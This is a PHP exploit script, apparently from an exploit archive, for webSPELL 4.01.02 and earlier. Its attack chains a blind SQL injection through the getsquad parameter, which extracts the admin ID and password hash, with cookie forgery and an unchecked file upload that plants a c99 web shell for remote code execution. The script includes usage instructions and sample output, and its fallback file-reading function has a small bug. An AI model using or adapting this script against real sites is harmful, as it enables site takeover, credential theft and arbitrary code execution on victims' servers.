webSPELL <= 4.01.02 Remote PHP Code Execution Exploit

[gmdarkfig () gmail com]

#!/usr/bin/php
<?php
/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

# Admin id: 1
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
------   webSPELL <= 4.01.02 Remote PHP Code Execution Exploit   ------
-----------------------------------------------------------------------
PHP conditions: register_globals=On
       Credits: DarkFig <gmdarkfig () gmail com>
           URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
  Usage: $argv[0] -url <> -file <> [Options]
 Params: -url       For example http://victim.com/webspell/ 
         -file      The file you wanna upload (c99shell.php...)
Options: -prefix    Table prefix (default=webs)
         -upmatch   The match which returns TRUE for the upload
         -sqlmatch  The match which returns TRUE for the SQL injection
         -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentification <proxyuser:proxypwd>
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
-----------------------------------------------------------------------
");exit(1);
}

$url            = getparam('url',1);
$file           = getparam('file',1);
$prfix          = (getparam('prefix')!='')   ? getparam('prefix')   : 'webs';
$match_upload   = (getparam('upmatch')!='')  ? getparam('upmatch')  : '\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';
$proxy          = getparam('proxy');
$authp          = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nAdmin id: ";
$userid = blind('userID');

print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));

print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);


# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
               "fileurl" => 1,
               "upfile"  => array(frmdt_filename => basename($file),
                                  frmdt_content  => file_get_contents($file)));

$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";


# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
        global $prfix,$xpl,$url,$match_blindsql;
        $d=0; $v='';
        
        if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
        else                   { $b=47;$c=70; } # 0-9a-z
        
        while(TRUE)
        {
                $d++;
                for($e=$b;$e<=$c;$e++)
                {
                    if($e==47) $f='NULL';
                    else $f=$e;

                    $sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
                          ."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
                          ." LIMIT 1),$d,1)=CHAR($f)";
               
                    $xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
                    if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
                    {
                        if($e==47)
                        {
                            return $v;
                        }
                        else
                        {
                            print strtolower(chr($f));
                            $v .= chr($f);
                            break;
                        }
                    }
                }
        }
}

function getparam($param,$opt='')
{
        global $argv;
        foreach($argv as $value => $key)
        {
                if($key == '-'.$param) return $argv[$value+1];
        }
        if($opt) exit("\n-$param parameter required");
        else return;
}

if(!function_exists('file_get_contents')) {
        function file_get_contents($file)
        {
                $handle  = fopen($file, "r");
                $content = fread($fd, filesize($file));
                fclose($handle);
                return $content;
        }
}

?>